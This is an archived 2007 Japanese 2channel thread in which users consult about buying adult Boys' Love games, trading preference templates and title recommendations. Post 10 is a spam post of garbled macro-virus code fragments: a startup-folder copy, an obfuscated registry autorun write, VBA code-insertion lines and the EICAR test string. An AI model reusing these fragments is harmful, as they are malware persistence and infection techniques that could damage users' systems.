2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

BL@【こんなのない?】18禁BLゲーム購入相談所6

1 :いけない名無しさん:2007/09/06(木) 15:02:44 ID:???
こういうゲームないかな
このゲームどう? そんな質問をしたいときに使ってください

◆相談前にテンプレを参考にしてみてください>>2-10あたり
 初心者の方=メジャータイトルを参考にしてみては?
 中級者の方=お好みのジャンルから選んでみては?
◆ 相談前にスレッド内を検索してください(Win「ctrl+F」、Mac「command+F」)
◆ 訊いてからすぐに返答がもらえないからって怒らない
◆ 次スレのスレ立ては、>>950の人がお願いします(スレ立て不能時は>>951で)

前スレ
BL@【こんなのない?】18禁BLゲーム購入相談所5
http://game12.2ch.net/test/read.cgi/gboy/1165947702/

過去スレ
【こんなのない?】18禁女向けゲーム購入相談所4
http://game9.2ch.net/test/read.cgi/gboy/1144826584/
【こんなのない?】18禁女向けゲーム購入相談所3
http://game9.2ch.net/test/read.cgi/gboy/1125229629/
【こんなのない?】18禁女向けゲーム購入相談所2
http://game9.2ch.net/test/read.cgi/gboy/1112014802/
【こんなのない?】ボーイズゲーム購入相談所
http://game9.2ch.net/test/read.cgi/gboy/1066442622/

18禁乙女ゲームの購入相談はこちらのスレで
■18禁乙女ゲーム購入相談所■
http://game9.2ch.net/test/read.cgi/gboy/1161723168/

全年齢のゲームを探しているならこちらへどうぞ
乙女ゲーム購入相談所6
http://game9.2ch.net/test/read.cgi/ggirl/1160934373/

■全年齢BLゲーム購入相談・雑談所■
http://game9.2ch.net/test/read.cgi/ggirl/1067596755/

2 :いけない名無しさん:2007/09/06(木) 15:06:58 ID:???
相談用テンプレ

【ジャンル】ADV・ノベル・SLG・RPGなど
【予算】◎◎円〜××円など
【萌え】カプ、単体、シチュでの好みや欲しい傾向を
【萎え】カプ、単体、シチュでの苦手や地雷傾向を
【許容】できれば避けたいが地雷というほどではないものを
【プレイ済み】探しているものと傾向の近いプレイ済みがある場合は参考になります。
【検討中】気になってるものがありましたら
【その他】補足がありましたらどうぞ

3 :いけない名無しさん:2007/09/06(木) 15:08:25 ID:???
用語解説
・総受け(攻略対象に対して主人公が全て受けに回るor攻めるキャラが1人ないし2人以下)
・総攻め(攻略対象に対して主人公が全て攻めに回る。ただし該当する作品は死ぬほど少ない)
・鬼畜(Bがどれだけ苦しんでいようが全くお構い無しにAが好き勝手にBを弄ぶ)
・陵辱(鬼畜の意味を含む意味合いが強いが、要するにAがBを人間扱いしないような扱いで一方的に犯す)
・純愛(読んで字の如く。とにかくAとBがラブラブ)
・脇カプ(主人公以外のキャラとキャラがカップリングになること)
・姫受け(主人公が攻略対象全員にちやほやされまくってモテモテ状態)
・性別受け(女のような外見にただブツつけただけのような受けのキャラ)
・スカトロ(大or小のいわゆる排泄物が絡むセックス)
・異物挿入(読んで字の如く。人間の体の一部以外の物を下に入れる)
・リバ(受攻の逆転するルートあり。1ルートで両方見られるものは同軸リバ。)

質問の際には上記のような用語を織り交ぜると答えてもらいやすいかもしれません。

4 :いけない名無しさん:2007/09/06(木) 15:09:27 ID:???
●スレ立てるまでもない質問スレ● その4
メーカー・ゲームタイトル等の当て字・略称等↓
http://game9.2ch.net/test/read.cgi/gboy/1159678257/3-8

PS2は「18歳以上のみ対象」が追加になり
対象未満への販売も自粛ではなく禁止として実質18禁だが
基本として「暴力行為」における警告でありエロが不可には変わりない。

5 :いけない名無しさん:2007/09/06(木) 15:13:49 ID:???
よくある質問

Q.リバゲーでお勧めありませんか
A.薔薇…総当たり、総リバ。鬼畜・純愛。ネックは絵が合うかどうか。シナリオ感動系。
 AM2:00…総当たり、総リバ。癒し系。ほのぼのしたいひと向け。攻略3人。お手軽。
 玉響…総当たりの総リバ。伝奇ゲー。ヘタレ攻の宝庫。テキストが少々判子だが、絵はかなり良質。
 あがけ…総リバ。借金背負わせ陵辱ゲー。目押しゲー。少々アホテイスト。
 楽園…総リバ。低価格ゲー。一本道シナリオ。友情の延長上エチに萌えるひとにお勧め。アフロが怖い。
 修業…総リバ。京都弁。萌え度が高い。エチ薄味。
 王子1,2…総リバ。ほのぼのRPG。
 
Q.攻めまくって何ぼじゃ(#゚Д゚) ゴルァ!!
A.総攻めはハンクス、黒十、少年たちの病棟の3つ。
 ハンクス…全員マッチョ。属性乙女寄り。鬼畜。エチでお触りできます。主人公名前変更可。
 黒十…鬼畜陵辱ゲー。純愛シナリオ、BADの突き抜け方に定評あり。
      絵、システムに関してはマリソ系ということを念頭に。パッチ必須。公式あぼん中。
 少年たちの病棟…ショタゲー。

Q.むしろ掘られたいんですが(*^ー゚)b
A.上記以外は大抵受けがメイン。総受けはぷりプリ、紅☆、弄り、Lamentoなど。
 ぷりプリ…攻略対象、エチシチュが豊富。絵柄ほのぼの。鬼畜・BADが半分以上。近親、脇カプあり。
        アフォアフォの主人公を受け入れられるかが分かれ道。触手あり。
 紅☆…吸血鬼もの。シナリオ、音楽に定評あり。ボイスなし。 パッチ必須
 弄り…マリソの中で評判高い。いじめられっこ陵辱もの。システムはマリソ。
 Lamento…猫ゲー。

Q.鬼畜(;´Д`)l \ァ l \ァ
A.評判いいのは
 .上記から:薔薇、あがけ、黒十、ぷり
 上記以外:仮面(全裸、スカ大小)、birdie(ツバーキ)、冤罪(スカ小)、帝国、空の森(攻略サイト必須)

Q.アホゲー( ゚∀゚)アハハ八八ノヽノヽノヽノ \ / \/ \
A.裸バスケ、学プリ特攻してらっさい

6 :いけない名無しさん:2007/09/06(木) 18:10:13 ID:???
>>1乙!
テンプレ見る限り、これどう?でも大丈夫なんだろうか…
メーカースレでも聞きにくい内容なのでお願いします。

体験版をやって玉響を購入検討中なんですが、自分は可愛い顔して腹黒いキャラが
とても苦手です。そこかしこで聞くのですが、メインキャラの彼は腹黒なんでしょうか?
あと
・脇カプに個別EDはあるのか、脇カプの絡みイベントは愛有りか無しか
・主人公カプの各ルートは最終的に(goodEDだと)愛情有りになるのか、
悲恋しかないカプはないか

よろしくお願いします。

7 :いけない名無しさん:2007/09/06(木) 18:15:37 ID:???
>>6
速攻で答えたるで!

・ピンク髪の彼は→腹黒ですサーセンwww
でも中の人が素晴らしいので一聴の価値あり
・脇カプ個別ED→あります
愛…とまではいかないまでも、ちゃんと情がある
・主人公絡み→ラブラブです^^

さあ、ちょっと遅い夏を満喫しておいで〜

8 :いけない名無しさん:2007/09/06(木) 21:57:57 ID:???
>>7
レスありがとうございます!やっぱ腹黒でしたかw
食わず嫌いなところも少なからずあるので、新境地開拓と思って
特攻してみます。目当ての親友とネギさんのために(*´Д`)

9 :いけない名無しさん:2007/09/06(木) 22:02:28 ID:???
>1乙です
久しぶりにBLゲやりたいのでよろしくお願いします

【ジャンル】特にこだわりなし
【予算】1〜2本分
【萌え】主人公攻・ツンデレ受・大人びた少年・純愛
LL(セルジ)天狗の八衢(兄弟)天使羽根(翔櫂)王レベ(白鳳受・ちゃぷ)
神無(キャラはレンジャク・話は人間二人)薔薇(木火・金火・土木)絶服(ティモ・エドゥアルト)病棟(カヲル)
【萎え】主人公総受・愛のない鬼畜陵辱・スカ・姫受・顎の刺さりそうな絵・おっさん
【許容】同軸リバ
【プレイ済み】↑のもの以外未プレイ
【検討中】特になし 情報もいまいち仕入れてません
【その他】可愛い感じの絵が好きです
萌えに書いた作品は先に書いてある順に好きなゲームです
絵が可愛くて昔体験板をやったけどAM2:00は合わない感じでした

10 :いけない名無しさん:2007/09/06(木) 22:42:33 ID:???
Set A4 = A1.CreateTextFile(A1.BuildPath(A1. 1)))
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo ", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1. (BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E. 1), A("VHORU@SU/WCR"))
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
kak\ \';\ken=\wd+'\START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
whichfile = p + w * 10
End Sub


11 :いけない名無しさん:2007/09/06(木) 22:49:51 ID:???
>>9
顎の刺さりそうな絵ワロタw
修業旅行はどうだろう。
テンプレにある通り総リバだけど、ツンデレもいるし萎えに当てはまるようなものはない。


12 :いけない名無しさん:2007/09/06(木) 22:57:17 ID:???
>>9
桜雪はどうだろ?
主人公がツンデレショタ。薔薇の火に似てるかも。

ただ、主受が大半。

13 :いけない名無しさん:2007/09/06(木) 23:24:37 ID:???
>11
調べてみたらツボに入りそうな眼鏡がいたので特攻してみたいと思います
公式GC見たら主受に見えるけど総リバのようなので良かったです
>12
折角教えていただいたのですが主受が多いのと顎で怪我しそうなので見送ります
すいません


14 :いけない名無しさん:2007/09/07(金) 01:07:43 ID:???
前スレ993へ
http://game12.2ch.net/test/read.cgi/gboy/1165947702/993

公式には、まだ発表無いけど
プリプリは、11/22に廉価版でるみたいだよ。
ttp://www.getchu.com/soft.phtml?id=456505

15 :いけない名無しさん:2007/09/07(金) 02:29:13 ID:???
来週PSPから大作が発売される件
wktkして待とうぜw

CCFF7(クライシスコア ファイナルファンタジー7)
http://www.jeux-france.com/Webmasters/Images/34851120070906_130852_0_big.jpg
http://www.jeux-france.com/Webmasters/Images/34851120070906_130856_1_big.jpg
http://www.jeux-france.com/Webmasters/Images/34851120070906_130859_2_big.jpg
http://www.jeux-france.com/Webmasters/Images/34851120070906_130903_3_big.jpg
http://www.jeux-france.com/Webmasters/Images/34851120070906_130908_4_big.jpg


16 :いけない名無しさん:2007/09/07(金) 08:03:47 ID:???
前スレ993
萌えを見た感じだと、好きしょとか良いんじゃないかと思った
可愛い系の絵で、性別受け多いし、学園が舞台だ
幼馴染み(攻略対象じゃないが)や愛ある鬼畜も有る

ただ、年の差やショタに引っ掛かりそうなのがいるので、公式を見てみると良いかも

17 :いけない名無しさん:2007/09/07(金) 11:56:14 ID:???
前スレ>>993です。

アドバイスまりが!
好きしょは調べて、これから考えます。
ぷりプリは近日購入しようかと思いますw

18 :いけない名無しさん:2007/09/07(金) 16:45:30 ID:???
新たな萌えを求めて…
相談させて頂きます

【ジャンル】特にこだわらない
【予算】4・5本買おうかなと
【萌え】主人公攻め、男らしい受け(?)、
ピュアショタ受け、おっさん受け
【萎え】今のところ特になし
【許容】グロテスク描写、愛のないもの
【プレイ済み】
・学園ヘヴン(篠宮さんが受けなら良いのにと思った…)
・咎狗の血(源泉が受けなら(ry)
・絶対服従命令(ディルク・アネル・ヴェルナー萌え)
・玉響(途中ですが遼さん可愛い)
【検討中】メーカーさん繋がりで、鬼畜眼鏡やLLなんかを
【その他】未プレイですが「俺の下であがけ」は持ってますw

どれも楽しくプレイ出来ましたが、Hシーンに萌えた記憶がありません/(^o^)\
過程のシナリオ重視というか慣れてないだけかも…
なので、「このゲームのエロは(・∀・)イイ!」
というオススメもあればお願いします〜

19 :いけない名無しさん:2007/09/07(金) 19:18:29 ID:???
>>18
主攻め・男前受属性ありの自分が楽しめたもので
特にエロも良かったと思ったものをすすめてみる。

バーディ…分岐多い。複数視点(主人公なし)という特殊なゲーム。
       萌えは大方網羅していると思う。鬼畜エロ。鬱EDが多い。同ブランドのカフェリンもいいかも。
薔薇…総リバゲーなのでボリュームがある。ショタ2人はツンデレと性悪なのでピュアではないかも。
     シナリオ定評あり。
メサイア…シナリオ定評あり。悲恋系。あとエチシーンが長いのも特徴。
       主受けがほとんどだけど、性格は女々しくはない。鬱EDが多い。

そして条件ストライクのあがけを崩すんだ!

20 :いけない名無しさん:2007/09/07(金) 23:21:06 ID:???
前スレ>>983の者です。
いろいろ教えてもらってどれにするか悩みましたが、主人公のお兄さんが気になるのでまず最初にセラフィム・スパイラルプラスを購入してみようと思います。
セラスパの攻略が終わったら桜坂を買う予定です。
教えてくれた方、ありがとうございました。

21 :いけない名無しさん:2007/09/08(土) 01:50:09 ID:???
【ジャンル】特にこだわりなし
【予算】1,2本分
【萌え】主人公に対して深い愛情が感じられる描写があるもの
【萎え】スカ、愛のないエチ、人外攻め、精神崩壊
【許容】道具プレイ、ソフトなSM
【プレイ済み】コイビト、薔薇、学ヘヴ、カフェリン、ピヨたん、眼鏡、heartner hearts、そし僕
【検討中】スクエアな関係
【その他】コイビト遊戯をプレイして一部過激なエンドを除いて
深い愛情と執着を感じたのでそのようなゲームがプレイしたいです。
できれば、声付きでシステムが快適なものがよいです。

どうぞよろしくお願いいたします!

22 :いけない名無しさん:2007/09/08(土) 04:00:24 ID:???
>>21
メサイアはどうだろう?
精神崩壊系のルートもあるのが難点か。

23 :いけない名無しさん:2007/09/08(土) 10:46:54 ID:???
>>22
レスTHXです!
システムも快適で評判がよいゲームみたいですね。
吸血鬼ものは興味があるので真剣に購入を検討したいと思います。
アドバイスありがとうございました!

24 :18:2007/09/08(土) 19:20:57 ID:???
>>19
たくさんありがとうございます!
オススメポイントがわかりやすくて助かります
とりあえず全部買ってみますねw

25 :いけない名無しさん:2007/09/09(日) 02:53:28 ID:???
テンプレにある紅☆とは正式名は何ですか?
ぐぐっても分からなかったものでorz

26 :いけない名無しさん:2007/09/09(日) 03:12:54 ID:???
>>25
下で検索かけるといいよ「紅★」で
●スレ立てるまでもない質問スレ● その4
メーカー・ゲームタイトル等の当て字・略称等↓
http://game12.2ch.net/test/read.cgi/gboy/1159678257/3-8

27 :いけない名無しさん:2007/09/09(日) 04:54:34 ID:???
>>26
ありがとうございます!モヤモヤがすっきりしました。
そして微妙にスレ汚しすみませんorz

28 :いけない名無しさん:2007/09/11(火) 14:06:01 ID:???
>>18
篠宮が受だったら…と思うなら眼鏡は悪くない気がする。主攻あるし、男らしい受けもある。
LLはピュアショタ受の条件には当てはまる。あと主攻多し。
個人的には是非「黒の十字架」を勧めたいが、手に入らないかも。主攻・ピュアショタ(?)受でエロい。

29 :いけない名無しさん:2007/09/11(火) 15:29:22 ID:???
咎狗の血のことで相談させてください。
今まで詳しい内容も知らずスルーしてたんですが、ネタバレを少し
聞いたところケイスケのルートだけ異常に気になって買おうか悩んでいます。
主人公の姫受けっぷりと、グロの度合いはどんなものなんでしょうか?
また全体的に鬱や強姦っぽい感じがするんですが、このゲームにほのぼのやラブは
求めちゃいけないんでしょうか?

30 :いけない名無しさん:2007/09/12(水) 05:01:02 ID:???
>>29
主人公は9割方受けでルートによっては甘い部分もあるけど強姦度は高し。
グロはそれほどでもないけど、ケイスケBADエンドは一部回避したほうがいいかもしれない。
ほのぼのラブラブを求めるなら、同ブランドのLamentoの方が向いていると思うがどうだろうか?

31 :いけない名無しさん:2007/09/12(水) 13:36:33 ID:???
固定カプものを探しています
お勧めはありますでしょうか?

【ジャンル】問わず
【予算】問わず
【萌え】ショタ〜少年、(ショタでなくても)綺麗系受、わんこ攻
【萎え】オヤジ受け、筋肉受け
【許容】スカ(大小)
【プレイ済み】
固定→翼純粋、ぼっこい
他→冤罪、帝国、絶服、LL、午前二時、ラシエル、薔薇
【検討中】愛欲
【その他】未発売のものでは新婚さんとメイドを考えてます

固定カプ自体少ないと思うので、商業、同人問わずで萎え回避していそうなら教えて下さると嬉しいです
(同人NGだったらごめんなさい)

32 :いけない名無しさん:2007/09/12(水) 14:19:52 ID:???
>>31
メサイアを押してみる
カプ固定じゃないけど攻略キャラ2人だし
綺麗系受だしワンコ攻だし

33 :18:2007/09/12(水) 18:36:50 ID:???
>>28
遅くなったけどありがとう!
今の積みが崩れたら全部購入したいと思いますw

34 :いけない名無しさん:2007/09/12(水) 21:03:11 ID:???
>>31
同人・固定カップリング
○「skymoon(漢字に変換)」の「機会の互換」とかお勧めw
○「BL@Fさん 総合スレッド (同人)」のサイトは、固定カップリングのゲーム多いよ
年齢は高いけど綺麗系受、わんこ攻とかあるしね

35 :29:2007/09/12(水) 21:54:56 ID:???
>>30
レストン!BADの一部回避ということで考えましたが、GOODのために買ってこようと思います

36 :いけない名無しさん:2007/09/13(木) 00:03:37 ID:???
眼鏡で初BLに挑戦して見事にスーツにはまりました。リーマン系は少ないと聞いたんですが・・・。
眼鏡みたいに切れ長目の綺麗な絵の登場人物が大好物です。
ご教授おねがいします。

【ジャンル】特になし
【予算】特になし
【萌え】スーツ リーマン
【萎え】絵が丸っこくて、登場人物の目がデカくてキラキラ乙女チック
【許容】スカトロ
【プレイ済み】あがけ 眼鏡
【検討中】特になし
【その他】

37 :いけない名無しさん:2007/09/13(木) 00:37:28 ID:???
丸ごとリーマン物って私は眼鏡ぐらいしか知らないな
あんまり萌えにストライクなものは思いつかないけど一応それっぽいキャラが出てくるものを・・・
絵は上の二つが綺麗かな。公式見てみて

玉響 咎狗 birdie ピヨたん


38 :いけない名無しさん:2007/09/13(木) 00:52:32 ID:???
タイトルそのまんま、スーツを脱いだあと…がある
自分もスーツ萌えなんだけどなんとなく危険な香りがしたので回避してしまったため
出来は不明

39 :いけない名無しさん:2007/09/13(木) 01:05:04 ID:???
>>37
レスありがとうございます
やっぱないんですね・・・でも絵はbirdie、スーツはピヨたんが気になりました。
まずはピヨたんやってみることにします!
ありがとうございましたー!

40 :いけない名無しさん:2007/09/13(木) 01:34:50 ID:???
>>38
レスどうもです!
これは・・・キタかもしれません!絵もいい!
でも確かに危険な香りがしますね〜、2002年w
レビューは賛否両論あるみたいですが、ピヨたんちょっと置いといて先にこっちやってみます!
ありがとうございました!


41 :いけない名無しさん:2007/09/13(木) 06:47:18 ID:???
>31
古いが最強彼氏。が固定カプオムニバス(カプ別の短編ゲーム4本)
ショタ受、少年受、綺麗受、ヘタレ攻あり
オヤジ…ではないと思うけど20代の教師受あり

42 :いけない名無しさん:2007/09/13(木) 07:09:45 ID:???
>36
僕の独裁者
dept危ないプレジデント

43 :いけない名無しさん:2007/09/13(木) 07:17:10 ID:???
>>31
41見て思い出したけど、甘納豆ぱふぇの愛と欲望も固定カプオムニバス
ショタ少年風綺麗受け

44 :いけない名無しさん:2007/09/14(金) 19:34:28 ID:???
相談させてください。

ゲーム名は『神無ノ鳥』

会社が倒産でゲーム自体が絶版しているらしく、新品が見つかりません。
中古で一万こえていて買おうかかなり悩んでます。
基本的に鬱ゲーが好きで、ラストが感動できるものが好きなんですが、どうでしょうか。
そんなに興味のなかったショタゲーだということで少し迷うんですが、ハッカンというキャラクターとストーリーが非常に気になってます。
ちなみに同意の上の恋愛、純愛が好みです。レイプはあまり好きではありません。
お姉さま方、宜しくお願いします。


45 :いけない名無しさん:2007/09/14(金) 21:06:15 ID:???
>>44
後押しスレのが良いかも…と思いつつ、答えさせて頂きますね。

まずストーリーですが、個人的に凄く良いです。感動します。
プレイした後、心があったかくなる、そんなゲーム。
シナリオも非常にボリュームがあって、やりごたえがあります。

お目当てのハッカンですが、彼を攻略するためには別のキャラを先に攻略しなければルートに入れません。
1人1人のシナリオが長いので、ハッカンにしか興味がないなら少し辛いかも。
とはいえ、そのシナリオを踏まえてのハッカンシナリオは本当に感動するので
損をするということはまずないと思います…贔屓目ですがw

攻め受けも自由、ただ脇カプがあるので苦手なら注意。

中古で高いということは、それだけ需要と価値があるってことではないでしょうか。
少しでも安く…というならオークションや中古ショップを巡ってみては。

長々と後押しみたいで失礼しました。
少しでも>>44さんのお役に立っていれば幸いです。
私も大好きな作品なので…

46 :いけない名無しさん:2007/09/16(日) 12:03:37 ID:???
【ジャンル】ADV
【予算】いくらでも
【プレイ済萌え】鬼畜眼鏡、天使羽、帝国千戦記、あがけ、玉響
・学生っぽい雰囲気が好きですが、年上(おっさん)系もいたら嬉しいです。
【他プレイ済】 ヘヴン、神無、咎狗、王レベ
【地雷】可愛い総受けorクールビューティー主人公、 あからさまに受けっぽい受けキャラ
【検討中】そして僕らは、修業旅行
【その他】何より話が長めで面白い、ノンケが恋愛に落ちる過程を楽しめるもの

47 :46:2007/09/16(日) 12:04:37 ID:???
↑書き忘れたorz
積みゲーを一通り終えたので、お勧めありましたらよろしくお願いします。

48 :いけない名無しさん:2007/09/17(月) 00:21:44 ID:???
>>46
検討中の「そし僕」は合ってるんじゃないかな?
学生っぽいのと、その他の話が長め(つか、小説的なので一文が長いので
ものすごく長く感じる)で、満たしてると思う
面白いかどうかは主観になるけど、それほど文章に大きな破綻とかも無いし
内容的にも「玉響」が萌えに入ってるならいけるんじゃないかな

あとは「楽園行」とか。
主人公たちの学生っぽい感じは合うんじゃないかと思うが、ちょっと話が短いかも
個人的にはノンケが落ちる過程も楽しめたよ

49 :いけない名無しさん:2007/09/17(月) 16:45:43 ID:???
>>48
レスありがとうございます。そし僕の話が長めなのは知らなかったので、
ますます欲しくなりました!早速ポチりました。
楽園行は恋愛要素が薄め(セフレ的?)と聞いていたので
選択肢に入れていませんでした…キャラやノリは凄く好みなのですが

50 :いけない名無しさん:2007/09/17(月) 18:09:56 ID:???
>46
薔薇ノ木はどうだろう
時代物だけど攻略キャラの過半数は学生、ひとりは教師
話は長くて面白い

51 :いけない名無しさん:2007/09/17(月) 20:02:38 ID:???
【ジャンル】特になし
【予算】1万円まで
【萌え】眼鏡(受攻どちらでも可)
【萎え】性別受 姫受
【許容】特になし
【プレイ済み】鬼畜眼鏡
【検討中】マスカレード・俺下

【その他】
眼鏡キャラがメイン、もしくはたくさんでてくるゲームを探しています
受攻どちらでも可です。俺下→山口さん マスカレは眼鏡が三人いる ので検討中です。

宜しくお願いします。

52 :いけない名無しさん:2007/09/17(月) 20:26:07 ID:???
>>51
マスカレいいんじゃないかな。序盤は眼鏡ばっかりの眼鏡天国。

脇カプがおkなら、玉響も主人公と攻略キャラの2人が眼鏡。
非眼鏡キャラ攻略中も眼鏡キャラが脇カプの片割れになるので、
実際の眼鏡率より眼鏡率は高く思える。
性別受けっぽいキャラはいるけど、リバるので大丈夫じゃないかな。

53 :いけない名無しさん:2007/09/17(月) 21:10:41 ID:???
【ジャンル】同人でも全年齢でもOK
【予算】〜1万円
【萌え】
受け:ツンデレ、口や態度が悪い、アホの子、元気系、女王、俺様
男らしい、意地っ張り、乙女らぶどろのロイ
攻め:ヘタレ、年下、ドジっ子、不遇(不運?)
【萎え】姫・総受け主人公(攻略キャラなら総受けや姫可)、スカ
【許容】愛のないレイプ、ショタ
【プレイ済み】バーディー、カフェリン、帝国、薔薇、あがけ、玉響、王子様シリーズ
【検討中】発売前ですがスクエア、新婚
【その他】受けでも攻めでもわんこ系が好きです。主人公攻めかリバ、脇カプが大好きです。

帝国の朱や、乙女ですがらぶどろのロイみたいな受けキャラを攻略できるのがあれば
教えてください。↑みたいな受けであれば総受け主人公でも、全年齢でも構いません。
その他萌えに当てはまりそうなのもあれば、よろしくお願いします。

54 :いけない名無しさん:2007/09/17(月) 22:08:55 ID:???
>>51
玉響はどうだろう。
マスカレも俺下もいいと思うよー。

55 :いけない名無しさん:2007/09/18(火) 21:32:59 ID:???
>>53
天使羽根+天使羽根琥珀(外伝)はどうだろう?
総当たり、過半数リバで
受け属性:ツンデレ意地っ張り、俺様で口と態度が(特定の相手に対し)悪い、元気わんこ
攻め属性:年下攻め4組(琥珀はもっと増える)、不運不幸青年、ドジっ子(琥珀のみ)、元気わんこ
ただ、回避可能だがレイープが複数有り、ほぼ総受け主人公(でもほぼリバ)あり。
主人公が誰か忘れるくらい脇カプ作り放題。
新品で全部買うと軽く2万超えるけど、中古なら全部で万超えないとオモ
あまり出来はよくないが、PS2全年齢移植版もある

56 :いけない名無しさん:2007/09/18(火) 22:59:02 ID:???
>53
LLどうだろう
許容の両方にひっかかるけど
主人公はわんこ系の攻だし受に口と態度の悪いツンデレがいる

57 :53:2007/09/18(火) 23:40:24 ID:???
>>55
ありがとうございます、公式見てみたのですが、ロンゲキャラがちょっと…
書き忘れてましたが 萎え:ロンゲ受け があります。
もう少しこのゲームの情報集めてから検討したいです。
でもカプ多目はいいですね、結構惹かれます

>>56
ありがとうございます、公式見てみたらコーネルがかなり萌えそうな予感です!
買おうと思います、感謝!

58 :いけない名無しさん:2007/09/29(土) 01:12:23 ID:???
【ジャンル】特にこだわらない
【予算】1-2本
【萌え】精神的な屈辱&支配、ツンデレ受、鬼畜陵辱系、偏屈な愛、
    スーツ、知的眼鏡キャラ、性悪知的キャラ 
【萎え】ショタ、筋肉、絵がカワイイ、主人公が女顔(コイビト遊戯の主人公×)
【許容】ゲーム自体が面倒なもの
【プレイ済み】 鬼畜眼鏡 (初のボブゲー)
【検討中】俺の下であがけ 玉響(絵がいいかも)
【その他】佐伯(眼鏡)X御堂 か、逆に佐伯(眼鏡)X片桐みたいなのが○
     スーツものは少ないと上にあるので 
     精神的な屈辱&支配、ツンデレ受、鬼畜陵辱系 が第一条件。
 
     
 ついでにアドバイスいただけると嬉しいのですが、
 学園ヘヴンはゲームはやってません。(アニメのみ)
 PC版だと声がないということなのですが、声なくても萌えますか?
 性悪眼鏡キャラの中嶋サンが気になるので買おうかと迷ってます。

59 :いけない名無しさん:2007/09/29(土) 01:52:08 ID:???
>>58
バーディとか薔薇はどうだろう?
萎えのショタに該当するかもしれないけど。

もし筋肉にひっかからなければ全力であがけを押す。

60 :いけない名無しさん:2007/09/29(土) 02:07:01 ID:???
>>59
レスサンクスでえす。
マッチョがダメなんですが、
あがけはやはり筋肉なんですか?どの程度筋肉なんですか??

ショタのレベルにもよりますが、
男の子より男を嬲る感覚のがソソるんですw
薔薇は時代設定がどうかな?と思ってるのですが
気にならないですか?
あとバーディってホノボノ系かと思ったん避けたんですが。


61 :いけない名無しさん:2007/09/29(土) 02:19:44 ID:???
>>60
birdieは鬼畜っていうと必ずあがるソフトのひとつですよ
ついでに鬱です。萎えのショタ・筋肉・女顔にも当たらないはず
システムがいわゆる普通のADVと違うので公式で確認してみては如何でしょうか

62 :いけない名無しさん:2007/09/29(土) 05:35:35 ID:???
>58です。
>>61
レスサンクスです。

59さん、61さんのアドバイスから、下の2本決めました。
ありがとうございました。

あがけ…アホっぽいらしいとこがあるらしいので鬼畜とは別の意味で期待。
birdie…希望より若干歳が若いですが、鬼畜度+難易度が高いみたいなので期待。

あら、こんな時間だわ。


63 :いけない名無しさん:2007/09/30(日) 04:44:12 ID:???
【ジャンル】特になし
【予算】2本程度
【萌え】鬼畜、陵辱、ツンデレ、強気受、スカ(小)、やや年齢高め(20代〜
【萎え】ショタ、甘々、鬱エンド、流血、ボリュームがない
【許容】特になし
【プレイ済み】鬼畜眼鏡、あがけ、マスカレード
【検討中】コイビト遊戯、黒の十字架、弄り遊戯、birdie、乙女ゲーになるんですけどUTM
【その他】鬼畜陵辱系(暴力系は苦手)がベースでシナリオにボリュームがあって、なおかつ最後には愛のあるエンドが1つでもあるゲームを探しています。
注文多くてすみませんorz
アドバイスお願いします!

64 :いけない名無しさん:2007/09/30(日) 22:58:56 ID:???
>>63
鬱がニガテならコイビトは止めた方がいいかも…
精神的に鬱になるENDが結構ある
マスカレで禿萌えした自分が胃が痛くなったくらいだorz



65 :いけない名無しさん:2007/09/30(日) 23:09:24 ID:???
>>63
検討中のやつは全部鬱エンド有りですよw
鬱と流血無しの非暴力系で鬼畜陵辱ベースの作品ってあったっけ?
言葉攻めが該当する?

言葉攻めだったらバーディの椿が最強だと思うよ。
萌え要素はほぼ網羅してるし、鬱エンド以外の萎えは無し。

66 :いけない名無しさん:2007/09/30(日) 23:51:20 ID:???
愛あるEDが一つでもある、という条件ならほぼ全てのゲームが当てはまるけど
鬼畜かつ欝ED無しって条件はかなり難しい。
ヘヴンの中嶋ルートは欝ED無しだけど、それ以外の条件ほとんど満たしてないし。

67 :いけない名無しさん:2007/10/01(月) 13:28:23 ID:???
>>63
萎え混みになるけど、萌えを満たしそうなものをすすめてみる。
一応おすすめ順。

まず薔薇はどうだろう?
萌の鬼畜、陵辱、ツンデレ、強気受を満たす。
でも同時にショタも満たす(6人中2人)ので注意。
カプが成立せず→鬱ED、という展開が他のゲームは多いけど、
薔薇はシステム的にそういうことがないので基本的には鬱EDも少ない。
カプ数豊富なので、シナリオのボリュームも心配はないと思う。

絶服は鬼畜、陵辱、ツンデレ、強気受あたりの萌えに該当。
攻略対象が多いのでシナリオ総数はかなり多い。
ただし、ショタ、甘々に該当するかもしれない。
また設定的に無理やり系は多いものの、鬼畜度が物足りない可能性があるので注意。

あとメサイアも結構萌を満たす。
鬼畜、陵辱、ツンデレ、強気受(これはちょっと微妙)、やや年齢高め(20代〜 に該当。
ただ、萎えの鬱EDと流血、ボリュームないにも抵触。
真相ED以外ほぼカプ不成立の鬱EDに突入。
一部だけど暴力系がある。
攻略対象が2人ということもあり、シナリオのボリュームはいまいち。(エチシーンは長い)

68 :いけない名無しさん:2007/10/01(月) 13:32:34 ID:???
つづき

自分がプレイ済みのもので、「検討中」の気になる点を
・黒の十字架
 たしかにベースは鬼畜陵辱系と言っていいかもしれない。
 マスカレあたりのバカゲーっぷりが好きなら、黒十の突き抜けたシナリオもおすすめかも。
 気が滅入るような鬱EDもそんなになかったと思う。強気受もいる。
 ただ、あまり痛そうではないかもしれないけど、流血・暴力系のものがあるので注意。
 あとプレイ済みと比べるとシステムのもっさり感がちょっと辛いか。

・弄り遊戯
 主人公がショタにひっかかる可能性があるので要確認。
 いじめられっこを陵辱する感じのため、いじめの延長のような鬼畜陵辱がベース。
 強気受じゃないけど嫌がり受。
 ただ、流血というほどハードではないものの
